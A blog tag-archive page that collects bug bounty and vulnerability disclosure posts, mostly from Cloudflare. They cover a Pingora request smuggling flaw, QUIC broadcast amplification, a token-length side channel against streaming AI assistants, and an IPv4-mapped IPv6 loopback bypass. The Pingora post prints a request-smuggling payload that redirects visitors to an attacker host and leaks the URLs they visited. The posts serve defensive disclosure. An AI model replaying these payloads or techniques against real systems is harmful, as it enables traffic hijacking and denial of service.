Tag Archives: bug bounty

Resolving a request smuggling vulnerability in Pingora

2025-05-22 Edward Wang

Post Syndicated from Edward Wang original https://blog.cloudflare.com/resolving-a-request-smuggling-vulnerability-in-pingora/

On April 11, 2025 09:20 UTC, Cloudflare was notified via its Bug Bounty Program of a request smuggling vulnerability in the Pingora OSS framework discovered by a security researcher experimenting to find exploits using Cloudflare’s Content Delivery Network (CDN) free tier which serves some cached assets via Pingora.

Customers using the free tier of Cloudflare’s CDN or users of the caching functionality provided in the open source pingora-proxy and pingora-cache crates could have been exposed. Cloudflare’s investigation revealed no evidence that the vulnerability was being exploited, and was able to mitigate the vulnerability by April 12, 2025 06:44 UTC within 22 hours after being notified.

What was the vulnerability?

The bug bounty report detailed that an attacker could potentially exploit an HTTP/1.1 request smuggling vulnerability on Cloudflare’s CDN service. The reporter noted that via this exploit, they were able to cause visitors to Cloudflare sites to make subsequent requests to their own server and observe which URLs the visitor was originally attempting to access.

We treat any potential request smuggling or caching issue with extreme urgency. After our security team escalated the vulnerability, we began investigating immediately, took steps to disable traffic to vulnerable components, and deployed a patch.

We are sharing the details of the vulnerability, how we resolved it, and what we can learn from the action. No action is needed from Cloudflare customers, but if you are using the Pingora OSS framework, we strongly urge you to upgrade to a version of Pingora 0.5.0 or later.

What is request smuggling?

Request smuggling is a type of attack where an attacker can exploit inconsistencies in the way different systems parse HTTP requests. For example, when a client sends an HTTP request to an application server, it typically passes through multiple components such as load balancers, reverse proxies, etc., each of which has to parse the HTTP request independently. If two of the components the request passes through interpret the HTTP request differently, an attacker can craft a request that one component sees as complete, but the other continues to parse into a second, malicious request made on the same connection.

Request smuggling vulnerability in Pingora

In the case of Pingora, the reported request smuggling vulnerability was made possible due to a HTTP/1.1 parsing bug when caching was enabled.

The pingora-cache crate adds an HTTP caching layer to a Pingora proxy, allowing content to be cached on a configured storage backend to help improve response times, and reduce bandwidth and load on backend servers.

HTTP/1.1 supports “persistent connections”, such that one TCP connection can be reused for multiple HTTP requests, instead of needing to establish a connection for each request. However, only one request can be processed on a connection at a time (with rare exceptions such as HTTP/1.1 pipelining). The RFC notes that each request must have a “self-defined message length” for its body, as indicated by headers such as Content-Length or Transfer-Encoding to determine where one request ends and another begins.

Pingora generally handles requests on HTTP/1.1 connections in an RFC-compliant manner, either ensuring the downstream request body is properly consumed or declining to reuse the connection if it encounters an error. After the bug was filed, we discovered that when caching was enabled, this logic was skipped on cache hits (i.e. when the service’s cache backend can serve the response without making an additional upstream request).

This meant on a cache hit request, after the response was sent downstream, any unread request body left in the HTTP/1.1 connection could act as a vector for request smuggling. When formed into a valid (but incomplete) header, the request body could “poison” the subsequent request. The following example is a spec-compliant HTTP/1.1 request which exhibits this behavior:

GET /attack/foo.jpg HTTP/1.1
Host: example.com
<other headers…>
content-length: 79

GET / HTTP/1.1
Host: attacker.example.com
Bogus: foo

Let’s say there is a different request to victim.example.com that will be sent after this one on the reused HTTP/1.1 connection to a Pingora reverse proxy. The bug means that a Pingora service may not respect the Content-Length header and instead misinterpret the smuggled request as the beginning of the next request:

GET /attack/foo.jpg HTTP/1.1
Host: example.com
<other headers…>
content-length: 79

GET / HTTP/1.1 // <- “smuggled” body start, interpreted as next request
Host: attacker.example.com
Bogus: fooGET /victim/main.css HTTP/1.1 // <- actual next valid req start
Host: victim.example.com
<other headers…>

Thus, the smuggled request could inject headers and its URL into a subsequent valid request sent on the same connection to a Pingora reverse proxy service.

CDN request smuggling and hijacking

On April 11, 2025, Cloudflare was in the process of rolling out a Pingora proxy component with caching support enabled to a subset of CDN free plan traffic. This component was vulnerable to this request smuggling attack, which could enable modifying request headers and/or URL sent to customer origins.

As previously noted, the security researcher reported that they were also able to cause visitors to Cloudflare sites to make subsequent requests to their own malicious origin and observe which site URLs the visitor was originally attempting to access. During our investigation, Cloudflare found that certain origin servers would be susceptible to this secondary attack effect. The smuggled request in the example above would be sent to the correct origin IP address per customer configuration, but some origin servers would respond to the rewritten attacker Host header with a 301 redirect. Continuing from the prior example:

GET / HTTP/1.1 // <- “smuggled” body start, interpreted as next request
Host: attacker.example.com
Bogus: fooGET /victim/main.css HTTP/1.1 // <- actual next valid req start
Host: victim.example.com
<other headers…>

HTTP/1.1 301 Moved Permanently // <- susceptible victim origin response
Location: https://attacker.example.com/
<other headers…>

When the client browser followed the redirect, it would trigger this attack by sending a request to the attacker hostname, along with a Referrer header indicating which URL was originally visited, making it possible to load a malicious asset and observe what traffic a visitor was trying to access.

GET / HTTP/1.1 // <- redirect-following request
Host: attacker.example.com
Referrer: https://victim.example.com/victim/main.css
<other headers…>

Upon verifying the Pingora proxy component was susceptible, the team immediately disabled CDN traffic to the vulnerable component on 2025-04-12 06:44 UTC to stop possible exploitation. By 2025-04-19 01:56 UTC and prior to re-enablement of any traffic to the vulnerable component, a patch fix to the component was released, and any assets cached on the component’s backend were invalidated in case of possible cache poisoning as a result of the injected headers.

Remediation and next steps

If you are using the caching functionality in the Pingora framework, you should update to the latest version of 0.5.0. If you are a Cloudflare customer with a free plan, you do not need to do anything, as we have already applied the patch for this vulnerability.

Timeline

All timestamps are in UTC.

2025-04-11 09:20 – Cloudflare is notified of a CDN request smuggling vulnerability via the Bug Bounty Program.
2025-04-11 17:16 to 2025-04-12 03:28 – Cloudflare confirms vulnerability is reproducible and investigates which component(s) require necessary changes to mitigate.
2025-04-12 04:25 – Cloudflare isolates issue to roll out of a Pingora proxy component with caching enabled and prepares release to disable traffic to this component.
2025-04-12 06:44 – Rollout to disable traffic complete, vulnerability mitigated.

Conclusion

We would like to sincerely thank James Kettle & Wannes Verwimp, who responsibly disclosed this issue via our Cloudflare Bug Bounty Program, allowing us to identify and mitigate the vulnerability. We welcome further submissions from our community of researchers to continually improve the security of all of our products and open source projects.

Whether you are a customer of Cloudflare or just a user of our Pingora framework, or both, we know that the trust you place in us is critical to how you connect your properties to the rest of the Internet. Security is a core part of that trust and for that reason we treat these kinds of reports and the actions that follow with serious urgency. We are confident about this patch and the additional safeguards that have been implemented, but we know that these kinds of issues can be concerning. Thank you for your continued trust in our platform. We remain committed to building with security as our top priority and responding swiftly and transparently whenever issues arise.

QUIC action: patching a broadcast address amplification vulnerability

2025-02-10 Josephine Chow

Post Syndicated from Josephine Chow original https://blog.cloudflare.com/mitigating-broadcast-address-attack/

Cloudflare was recently contacted by a group of anonymous security researchers who discovered a broadcast amplification vulnerability through their QUIC Internet measurement research. Our team collaborated with these researchers through our Public Bug Bounty program, and worked to fully patch a dangerous vulnerability that affected our infrastructure.

Since being notified about the vulnerability, we’ve implemented a mitigation to help secure our infrastructure. According to our analysis, we have fully patched this vulnerability and the amplification vector no longer exists.

Summary of the amplification attack

QUIC is an Internet transport protocol that is encrypted by default. It offers equivalent features to TCP (Transmission Control Protocol) and TLS (Transport Layer Security), while using a shorter handshake sequence that helps reduce connection establishment times. QUIC runs over UDP (User Datagram Protocol).

The researchers found that a single client QUIC Initial packet targeting a broadcast IP destination address could trigger a large response of initial packets. This manifested as both a server CPU amplification attack and a reflection amplification attack.

Transport and security handshakes

When using TCP and TLS there are two handshake interactions. First, is the TCP 3-way transport handshake. A client sends a SYN packet to a server, it responds with a SYN-ACK to the client, and the client responds with an ACK. This process validates the client IP address. Second, is the TLS security handshake. A client sends a ClientHello to a server, it carries out some cryptographic operations and responds with a ServerHello containing a server certificate. The client verifies the certificate, confirms the handshake and sends application traffic such as an HTTP request.

QUIC follows a similar process, however the sequence is shorter because the transport and security handshake is combined. A client sends an Initial packet containing a ClientHello to a server, it carries out some cryptographic operations and responds with an Initial packet containing a ServerHello with a server certificate. The client verifies the certificate and then sends application data.

The QUIC handshake does not require client IP address validation before starting the security handshake. This means there is a risk that an attacker could spoof a client IP and cause a server to do cryptographic work and send data to a target victim IP (aka a reflection attack). RFC 9000 is careful to describe the risks this poses and provides mechanisms to reduce them (for example, see Sections 8 and 9.3.1). Until a client address is verified, a server employs an anti-amplification limit, sending a maximum of 3x as many bytes as it has received. Furthermore, a server can initiate address validation before engaging in the cryptographic handshake by responding with a Retry packet. The retry mechanism, however, adds an additional round-trip to the QUIC handshake sequence, negating some of its benefits compared to TCP. Real-world QUIC deployments use a range of strategies and heuristics to detect traffic loads and enable different mitigations.

In order to understand how the researchers triggered an amplification attack despite these QUIC guardrails, we first need to dive into how IP broadcast works.

Broadcast addresses

In Internet Protocol version 4 (IPv4) addressing, the final address in any given subnet is a special broadcast IP address used to send packets to every node within the IP address range. Every node that is within the same subnet receives any packet that is sent to the broadcast address, enabling one sender to send a message that can be “heard” by potentially hundreds of adjacent nodes. This behavior is enabled by default in most network-connected systems and is critical for discovery of devices within the same IPv4 network.

The broadcast address by nature poses a risk of DDoS amplification; for every one packet sent, hundreds of nodes have to process the traffic.

Dealing with the expected broadcast

To combat the risk posed by broadcast addresses, by default most routers reject packets originating from outside their IP subnet which are targeted at the broadcast address of networks for which they are locally connected. Broadcast packets are only allowed to be forwarded within the same IP subnet, preventing attacks from the Internet from targeting servers across the world.

The same techniques are not generally applied when a given router is not directly connected to a given subnet. So long as an address is not locally treated as a broadcast address, Border Gateway Protocol (BGP) or other routing protocols will continue to route traffic from external IPs toward the last IPv4 address in a subnet. Essentially, this means a “broadcast address” is only relevant within a local scope of routers and hosts connected together via Ethernet. To routers and hosts across the Internet, a broadcast IP address is routed in the same way as any other IP.

Binding IP address ranges to hosts

Each Cloudflare server is expected to be capable of serving content from every website on the Cloudflare network. Because our network utilizes Anycast routing, each server necessarily needs to be listening on (and capable of returning traffic from) every Anycast IP address in use on our network.

To do so, we take advantage of the loopback interface on each server. Unlike a physical network interface, all IP addresses within a given IP address range are made available to the host (and will be processed locally by the kernel) when bound to the loopback interface.

The mechanism by which this works is straightforward. In a traditional routing environment, longest prefix matching is employed to select a route. Under longest prefix matching, routes towards more specific blocks of IP addresses (such as 192.0.2.96/29, a range of 8 addresses) will be selected over routes to less specific blocks of IP addresses (such as 192.0.2.0/24, a range of 256 addresses).

While Linux utilizes longest prefix matching, it consults an additional step — the Routing Policy Database (RPDB) — before immediately searching for a match. The RPDB contains a list of routing tables which can contain routing information and their individual priorities. The default RPDB looks like this:

$ ip rule show
0:	from all lookup local
32766:	from all lookup main
32767:	from all lookup default

Linux will consult each routing table in ascending numerical order to try and find a matching route. Once one is found, the search is terminated and the route immediately used.

If you’ve previously worked with routing rules on Linux, you are likely familiar with the contents of the main table. Contrary to the existence of the table named “default”, “main” generally functions as the default lookup table. It is also the one which contains what we traditionally associate with route table information:

$ ip route show table main
default via 192.0.2.1 dev eth0 onlink
192.0.2.0/24 dev eth0 proto kernel scope link src 192.0.2.2

This is, however, not the first routing table that will be consulted for a given lookup. Instead, that task falls to the local table:

$ ip route show table local
local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1
local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1
broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1
local 192.0.2.2 dev eth0 proto kernel scope host src 192.0.2.2
broadcast 192.0.2.255 dev eth0 proto kernel scope link src 192.0.2.2

Looking at the table, we see two new types of routes — local and broadcast. As their names would suggest, these routes dictate two distinctly different functions: routes that are handled locally and routes that will result in a packet being broadcast. Local routes provide the desired functionality — any prefix with a local route will have all IP addresses in the range processed by the kernel. Broadcast routes will result in a packet being broadcast to all IP addresses within the given range. Both types of routes are added automatically when an IP address is bound to an interface (and, when a range is bound to the loopback (lo) interface, the range itself will be added as a local route).

Vulnerability discovery

Deployments of QUIC are highly dependent on the load-balancing and packet forwarding infrastructure that they sit on top of. Although QUIC’s RFCs describe risks and mitigations, there can still be attack vectors depending on the nature of server deployments. The reporting researchers studied QUIC deployments across the Internet and discovered that sending a QUIC Initial packet to one of Cloudflare’s broadcast addresses triggered a flood of responses. The aggregate amount of response data exceeded the RFC’s 3x amplification limit.

Taking a look at the local routing table of an example Cloudflare system, we see a potential culprit:

$ ip route show table local
local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1
local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1
broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1
local 192.0.2.2 dev eth0 proto kernel scope host src 192.0.2.2
broadcast 192.0.2.255 dev eth0 proto kernel scope link src 192.0.2.2
local 203.0.113.0 dev lo proto kernel scope host src 203.0.113.0
local 203.0.113.0/24 dev lo proto kernel scope host src 203.0.113.0
broadcast 203.0.113.255 dev lo proto kernel scope link src 203.0.113.0

On this example system, the anycast prefix 203.0.113.0/24 has been bound to the loopback interface (lo) through the use of standard tooling. Acting dutifully under the standards of IPv4, the tooling has assigned both special types of routes — a local one for the IP range itself and a broadcast one for the final address in the range — to the interface.

While traffic to the broadcast address of our router’s directly connected subnet is filtered as expected, broadcast traffic targeting our routed anycast prefixes still arrives at our servers themselves. Normally, broadcast traffic arriving at the loopback interface does little to cause problems. Services bound to a specific port across an entire range will receive data sent to the broadcast address and continue as normal. Unfortunately, this relatively simple trait breaks down when normal expectations are broken.

Cloudflare’s frontend consists of several worker processes, each of which independently binds to the entire anycast range on UDP port 443. In order to enable multiple processes to bind to the same port, we use the SO_REUSEPORT socket option. While SO_REUSEPORT has additional benefits, it also causes traffic sent to the broadcast address to be copied to every listener.

Each individual QUIC server worker operates in isolation. Each one reacted to the same client Initial, duplicating the work on the server side and generating response traffic to the client’s IP address. Thus, a single packet could trigger a significant amplification. While specifics will vary by implementation, a typical one-listener-per-core stack (which sends retries in response to presumed timeouts) on a 128-core system could result in 384 replies being generated and sent for each packet sent to the broadcast address.

Although the researchers demonstrated this attack on QUIC, the underlying vulnerability can affect other UDP request/response protocols that use sockets in the same way.

Mitigation

As a communication methodology, broadcast is not generally desirable for anycast prefixes. Thus, the easiest method to mitigate the issue was simply to disable broadcast functionality for the final address in each range.

Ideally, this would be done by modifying our tooling to only add the local routes in the local routing table, skipping the inclusion of the broadcast ones altogether. Unfortunately, the only practical mechanism to do so would involve patching and maintaining our own internal fork of the iproute2 suite, a rather heavy-handed solution for the problem at hand.

Instead, we decided to focus on removing the route itself. Similar to any other route, it can be removed using standard tooling:

$ sudo ip route del 203.0.113.255 table local

To do so at scale, we made a relatively minor change to our deployment system:

  {%- for lo_route in lo_routes %}
    {%- if lo_route.type == "broadcast" %}
        # All broadcast addresses are implicitly ipv4
        {%- do remove_route({
        "dev": "lo",
        "dst": lo_route.dst,
        "type": "broadcast",
        "src": lo_route.src,
        }) %}
    {%- endif %}
  {%- endfor %}

In doing so, we effectively ensure that all broadcast routes attached to the loopback interface are removed, mitigating the risk by ensuring that the specification-defined broadcast address is treated no differently than any other address in the range.

Next steps

While the vulnerability specifically affected broadcast addresses within our anycast range, it likely expands past our infrastructure. Anyone with infrastructure that meets the relatively narrow criteria (a multi-worker, multi-listener UDP-based service that is bound to all IP addresses on a machine with routable IP prefixes attached in such a way as to expose the broadcast address) will be affected unless mitigations are in place. We encourage network administrators and security professionals to assess their systems for configurations that may present a local amplification attack vector.

Advancing cybersecurity: Cloudflare implements a new bug bounty VIP program as part of CISA Pledge commitment

2024-09-27 Sri Pulla

Post Syndicated from Sri Pulla original https://blog.cloudflare.com/cisa-pledge-commitment-bug-bounty-vip

As our digital world becomes increasingly more complex, the importance of cybersecurity grows ever more critical. As a result, Cloudflare is proud to promote our commitment to the Cybersecurity and Infrastructure Security Agency (CISA) ‘Secure by Design’ pledge. The commitment is built around seven security goals, aimed at enhancing the safety of our products and delivering the most secure solutions to our customers.

Cloudflare’s commitment to the CISA pledge reflects our dedication to transparency and accountability to our customers, and to cybersecurity best practices. Furthermore, Cloudflare is committed to being a trusted partner by sharing our strategies to ensure the highest priority is placed on safeguarding our customers’ security.

Bug bounty VIP program

Cloudflare has successfully managed a public Vulnerability Disclosure Program (VDP) for years; our belief is that collaboration is the cornerstone of effective cybersecurity. We are excited to announce a major milestone in our journey to meet Goal #5 of the pledge: our program will now include a bug bounty VIP program in conjunction with our bug bounty public program.

Continuous investment in maturing our bug bounty program is a vital tool for the success of any security organization. By encouraging broader participation in vulnerability testing, we open the door to more diverse perspectives and expertise, ultimately leading to stronger, more resilient security measures. Additionally, the new VIP program will allow us greater flexibility in engaging security researchers on upcoming betas for Cloudflare products, and will allow us to award higher bounty payouts.

Our commitment to this effort underscores our belief that a safer Internet is achievable through shared responsibility and proactive engagement. The security team at Cloudflare is looking forward to implementing a more proactive approach to securing our products with the launch of the new bug bounty VIP program!

What is in scope for the new VIP program?

The new bug bounty VIP program is an exclusive hub for select security researchers who either have the specialized technical expertise in the niche areas Cloudflare is building products in (such as Cloudflare Workers) or have demonstrated a deep understanding of our products and platform by actively participating in the public program with meaningful security findings. As a VIP member, security researchers will have access to beta testing environments for Cloudflare products. This includes early access to our newest features and unannounced products before they go live.

The VIP program’s scope will be carefully modeled from Cloudflare’s product release roadmap. Security researchers will have the opportunity to influence Cloudflare’s product and security development before release. VIP program participants also have the option to participate in external/gray box penetration testing activities (Spot Checks) for higher bounties related to security findings for upcoming product releases or critical infrastructure and services.

The VIP program’s new & enhanced reward structure

We believe that exceptional contributions deserve exceptional rewards. As a result, we’ve restructured our bounty offerings for the VIP program with higher payouts. Recognizing the specialized skills and expertise required, VIP researchers will be eligible for significantly higher rewards. We have also introduced bonus rewards for high-impact findings, particularly those that address critical vulnerabilities in our beta projects through the aforementioned Spot Checks. To further incentivize meaningful contributions, security researchers in our public program will receive milestone bonuses and be invited to our VIP program based on the number and quality of their submissions over time.

VIP Program (Private)
Critical	High	Medium	Low
$10,000-15,000	$4,000-7,000	$1,000-3,000	$250-750

What outcomes are we driving with the new VIP program?

The VIP bug bounty program’s focus is not only finding and fixing bugs, but it’s also aimed at fostering a deeper, more impactful relationship with our security researchers. Moreover, these outcomes align well with the CISA Vulnerability Disclosure Policy (VDP) goal. By offering exclusive access to beta software and enhanced rewards, our goals are as follows:

Elevate security standards: VIP researchers focusing on the most critical assets allows for further hardening of the overall security posture of Cloudflare’s products and services.
Accelerate product development: Early identification of vulnerabilities allows the remediation of potential issues before they reach production, yielding faster, more secure, and more stable releases.
Foster innovation: Involving researchers in the development process creates an additional feedback loop that encourages innovative approaches to security challenges.
Encourage collaboration: The bug bounty team will encourage collaborative blog posts for select reports as a way to disseminate security learnings and build partnerships with researchers.

This is a great professional growth opportunity for anyone in the technical research space as it gives participants the ability to work on cutting-edge technology with complex challenges, and can provide future opportunities for career/skill development.

How does Cloudflare benefit from it?

The launch of the VIP program marks a new chapter in Cloudflare’s security journey. We are excited about the opportunity to partner more closely with our top security researchers to build safer products for customers. Together, we can achieve new heights in security excellence:

Stronger security: Security researchers with expertise in niche topics can help enhance Cloudflare’s defenses against emerging and novel threats.
Proactive risk management: The new VIP program provides Cloudflare an additional avenue to identify and mitigate risks early in the product release cycle, reducing the likelihood of future security incidents.
Reinforced trust: Our commitment to security is central to our customer relationships and the trust they place in Cloudflare; by continuously improving our security posture, we seek to preserve that trust.

How can you help?

If you are a software manufacturer, we encourage you to familiarize yourself with CISA’s ‘Secure by Design’ principles and create a plan to implement them in your company.

As an individual, we encourage you to participate in the Cloudflare bug bounty program and promote cybersecurity awareness in your community.

Stay tuned for more updates, and if you’re part of our public program, keep submitting those reports — you might just earn an invitation to join the VIP ranks! You can also find more updates on our blog, as we build our roadmap to meet all seven CISA Secure by Design pledge goals by May 2025!

Let’s help build a better Internet together.

Mitigating a token-length side-channel attack in our AI products

2024-03-14 Celso Martinho

Post Syndicated from Celso Martinho original https://blog.cloudflare.com/ai-side-channel-attack-mitigated

Since the discovery of CRIME, BREACH, TIME, LUCKY-13 etc., length-based side-channel attacks have been considered practical. Even though packets were encrypted, attackers were able to infer information about the underlying plaintext by analyzing metadata like the packet length or timing information.

Cloudflare was recently contacted by a group of researchers at Ben Gurion University who wrote a paper titled “What Was Your Prompt? A Remote Keylogging Attack on AI Assistants” that describes “a novel side-channel that can be used to read encrypted responses from AI Assistants over the web”.
The Workers AI and AI Gateway team collaborated closely with these security researchers through our Public Bug Bounty program, discovering and fully patching a vulnerability that affects LLM providers. You can read the detailed research paper here.

Since being notified about this vulnerability, we’ve implemented a mitigation to help secure all Workers AI and AI Gateway customers. As far as we could assess, there was no outstanding risk to Workers AI and AI Gateway customers.

How does the side-channel attack work?

In the paper, the authors describe a method in which they intercept the stream of a chat session with an LLM provider, use the network packet headers to infer the length of each token, extract and segment their sequence, and then use their own dedicated LLMs to infer the response.

The two main requirements for a successful attack are an AI chat client running in streaming mode and a malicious actor capable of capturing network traffic between the client and the AI chat service. In streaming mode, the LLM tokens are emitted sequentially, introducing a token-length side-channel. Malicious actors could eavesdrop on packets via public networks or within an ISP.

An example request vulnerable to the side-channel attack looks like this:

curl -X POST \
https://api.cloudflare.com/client/v4/accounts/<account-id>/ai/run/@cf/meta/llama-2-7b-chat-int8 \
  -H "Authorization: Bearer <Token>" \
  -d '{"stream":true,"prompt":"tell me something about portugal"}'

Let’s use Wireshark to inspect the network packets on the LLM chat session while streaming:

The first packet has a length of 95 and corresponds to the token “Port” which has a length of four. The second packet has a length of 93 and corresponds to the token “ug” which has a length of two, and so on. By removing the likely token envelope from the network packet length, it is easy to infer how many tokens were transmitted and their sequence and individual length just by sniffing encrypted network data.

Since the attacker needs the sequence of individual token length, this vulnerability only affects text generation models using streaming. This means that AI inference providers that use streaming — the most common way of interacting with LLMs — like Workers AI, are potentially vulnerable.

This method requires that the attacker is on the same network or in a position to observe the communication traffic and its accuracy depends on knowing the target LLM’s writing style. In ideal conditions, the researchers claim that their system “can reconstruct 29% of an AI assistant’s responses and successfully infer the topic from 55% of them”. It’s also important to note that unlike other side-channel attacks, in this case the attacker has no way of evaluating its prediction against the ground truth. That means that we are as likely to get a sentence with near perfect accuracy as we are to get one where only things that match are conjunctions.

Mitigating LLM side-channel attacks

Since this type of attack relies on the length of tokens being inferred from the packet, it can be just as easily mitigated by obscuring token size. The researchers suggested a few strategies to mitigate these side-channel attacks, one of which is the simplest: padding the token responses with random length noise to obscure the length of the token so that responses can not be inferred from the packets. While we immediately added the mitigation to our own inference product — Workers AI, we wanted to help customers secure their LLMs regardless of where they are running them by adding it to our AI Gateway.

As of today, all users of Workers AI and AI Gateway are now automatically protected from this side-channel attack.

What we did

Once we got word of this research work and how exploiting the technique could potentially impact our AI products, we did what we always do in situations like this: we assembled a team of systems engineers, security engineers, and product managers and started discussing risk mitigation strategies and next steps. We also had a call with the researchers, who kindly attended, presented their conclusions, and answered questions from our teams.

Unfortunately, at this point, this research does not include actual code that we can use to reproduce the claims or the effectiveness and accuracy of the described side-channel attack. However, we think that the paper has theoretical merit, that it provides enough detail and explanations, and that the risks are not negligible.

We decided to incorporate the first mitigation suggestion in the paper: including random padding to each message to hide the actual length of tokens in the stream, thereby complicating attempts to infer information based solely on network packet size.

Workers AI, our inference product, is now protected

With our inference-as-a-service product, anyone can use the Workers AI platform and make API calls to our supported AI models. This means that we oversee the inference requests being made to and from the models. As such, we have a responsibility to ensure that the service is secure and protected from potential vulnerabilities. We immediately rolled out a fix once we were notified of the research, and all Workers AI customers are now automatically protected from this side-channel attack. We have not seen any malicious attacks exploiting this vulnerability, other than the ethical testing from the researchers.

Our solution for Workers AI is a variation of the mitigation strategy suggested in the research document. Since we stream JSON objects rather than the raw tokens, instead of padding the tokens with whitespace characters, we added a new property, “p” (for padding) that has a string value of variable random length.

Example streaming response using the SSE syntax:

data: {"response":"portugal","p":"abcdefghijklmnopqrstuvwxyz0123456789a"}
data: {"response":" is","p":"abcdefghij"}
data: {"response":" a","p":"abcdefghijklmnopqrstuvwxyz012"}
data: {"response":" southern","p":"ab"}
data: {"response":" European","p":"abcdefgh"}
data: {"response":" country","p":"abcdefghijklmno"}
data: {"response":" located","p":"abcdefghijklmnopqrstuvwxyz012345678"}

This has the advantage that no modifications are required in the SDK or the client code, the changes are invisible to the end-users, and no action is required from our customers. By adding random variable length to the JSON objects, we introduce the same network-level variability, and the attacker essentially loses the required input signal. Customers can continue using Workers AI as usual while benefiting from this protection.

One step further: AI Gateway protects users of any inference provider

We added protection to our AI inference product, but we also have a product that proxies requests to any provider — AI Gateway. AI Gateway acts as a proxy between a user and supported inference providers, helping developers gain control, performance, and observability over their AI applications. In line with our mission to help build a better Internet, we wanted to quickly roll out a fix that can help all our customers using text generation AIs, regardless of which provider they use or if they have mitigations to prevent this attack. To do this, we implemented a similar solution that pads all streaming responses proxied through AI Gateway with random noise of variable length.

Our AI Gateway customers are now automatically protected against this side-channel attack, even if the upstream inference providers have not yet mitigated the vulnerability. If you are unsure if your inference provider has patched this vulnerability yet, use AI Gateway to proxy your requests and ensure that you are protected.

Conclusion

At Cloudflare, our mission is to help build a better Internet – that means that we care about all citizens of the Internet, regardless of what their tech stack looks like. We are proud to be able to improve the security of our AI products in a way that is transparent and requires no action from our customers.

We are grateful to the researchers who discovered this vulnerability and have been very collaborative in helping us understand the problem space. If you are a security researcher who is interested in helping us make our products more secure, check out our Bug Bounty program at hackerone.com/cloudflare.

Championing CyberSecurity: Grab’s bug bounty programme in 2023

2023-12-19 Grab Tech

Post Syndicated from Grab Tech original https://engineering.grab.com/cybersec-bug

Launched in 2015, Grab’s Security bug bounty programme has achieved remarkable success and forged strong partnerships within a thriving bounty community. By holding quarterly campaigns with HackerOne, Grab has been dedicated to security and giving back to the global security community to research further. Over the years, Grab has paid over $700,000 in cumulative payments to committed security researchers, aiding their research.

Our journey doesn’t stop there – we’ve also expanded our internal bug bounty team, ensuring that we have the necessary resources to stay at the forefront of security challenges. As we continue to innovate and evolve, it’s critical that our team remains at the cutting edge of security developments.

Marking its eighth year in 2023, this initiative has achieved new milestones and continues to set the stage for an even more successful ninth year. In 2023, this included a special campaign in Threatcon Nepal, aimed at increasing our bounty engagements. A key development was the enrichment of monetary incentives to honour our hacker community’s remarkable contributions to our programme’s success.

Let’s look at the key takeaways we gained from the bug bounty programme in 2023.

Highlights from 2023

This year, we had some of the highest participation and engagement rates we’ve seen since the programme launched.

We’ve processed ~1000 submissions through our HackerOne bug bounty programme.
Impressive record of 400 submissions in the Q1 2023 campaign.
We’ve maintained a consistent schedule of campaigns and innovative efforts to enhance hacker engagement.
Released a comprehensive report of our seven-year bug bounty journey – check out some key highlights in the image below.

What’s next?

As Grab expands and transforms its product and service portfolio, we are dedicated to ensuring that our bug bounty programme reflects this growth. In our rigorous pursuit of boosting security, we regularly introduce new areas of focus to our scope. In 2024, expect the inclusion of new scopes, enhanced response times, heightened engagement from the hacker community, and more competitive rewards.

In the past year, we have incorporated Joint Ventures and Acquisitions into the scope of our bug bounty programme. By doing so, we proactively address emerging security challenges, while fortifying the safety and integrity of our expanding ecosystem. We remain fully dedicated to embracing change and growth as integral parts of our journey to provide a secure and seamless experience for our users.

On top of that, we continue to improve our methods of motivating researchers through the bug bounty programme. One recent change is to diversify our reward methods by incorporating both financial rewards and recognition. This allows us to cater to different researcher motivations, cultivate stronger relationships, and acknowledge researchers’ contributions.

That said, we recognise that there’s always room for improvement and the bug bounty programme is uniquely poised for substantial expansion. In the near future, we will be:

Introducing more elements to the scope of our bug bounty programme
Enhancing feedback loops on the HackerOne platform

With these improvements, we can drive continuous improvement efforts to provide a secure experience for our users while strengthening our connection with the security research community.

A word of thanks

2023 has been an exhilarating year for our team. We’re grateful for the continued support from all the security researchers who’ve actively participated in our programme.

Here are the top three researchers in 2023:

As we head into our ninth year, we know there are new opportunities and challenges that await us. We strive to remain dedicated to the values of collaboration and continuous improvement, working hand in hand with the security community to enhance our superapp’s security and deliver an even safer experience for our users.

We’re gearing up for another exciting year ahead in our programme, and looking forward to interesting submissions from our participants. We extend an open invitation to all researchers to submit reports to our bug bounty programme. Your contributions hold immense value and have a significant impact on the safety and security of our products, our users, and the broader security community. For comprehensive information about the programme scope, rules, and rewards, visit our website.

Until next year, keep up the great work, and happy hacking!

Join us

Grab is the leading superapp platform in Southeast Asia, providing everyday services that matter to consumers. More than just a ride-hailing and food delivery app, Grab offers a wide range of on-demand services in the region, including mobility, food, package and grocery delivery services, mobile payments, and financial services across 428 cities in eight countries.

Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!

Cloudflare’s handling of a bug in interpreting IPv4-mapped IPv6 addresses

2023-02-02 Lucas Ferreira

Post Syndicated from Lucas Ferreira original https://blog.cloudflare.com/cloudflare-handling-bug-interpreting-ipv4-mapped-ipv6-addresses/

Cloudflare's handling of a bug in interpreting IPv4-mapped IPv6 addresses

In November 2022, our bug bounty program received a critical and very interesting report. The report stated that certain types of DNS records could be used to bypass some of our network policies and connect to ports on the loopback address (e.g. 127.0.0.1) of our servers. This post will explain how we dealt with the report, how we fixed the bug, and the outcome of our internal investigation to see if the vulnerability had been previously exploited.

RFC 4291 defines ways to embed an IPv4 address into IPv6 addresses. One of the methods defined in the RFC is to use IPv4-mapped IPv6 addresses, that have the following format:

   |                80 bits               | 16 |      32 bits        |
   +--------------------------------------+--------------------------+
   |0000..............................0000|FFFF|    IPv4 address     |
   +--------------------------------------+----+---------------------+

In IPv6 notation, the corresponding mapping for 127.0.0.1 is ::ffff:127.0.0.1 (RFC 4038)

The researcher was able to use DNS entries based on mapped addresses to bypass some of our controls and access ports on the loopback address or non-routable IPs.

This vulnerability was reported on November 27 to our bug bounty program. Our Security Incident Response Team (SIRT) was contacted, and incident response activities began shortly after the report was filed. A hotpatch was deployed three hours later to prevent exploitation of the bug.

Date	Time (UTC)	Activity
27 November 2022	20:42	Initial report to Cloudflare’s bug bounty program
	21:04	SIRT oncall is paged
	21:15	SIRT manager on call starts working on the report
	21:22	Incident declared and team is assembled and debugging starts
	23:20	A hotfix is ready and deployment starts
	23:47	Team confirms that the hotfix is deployed and working
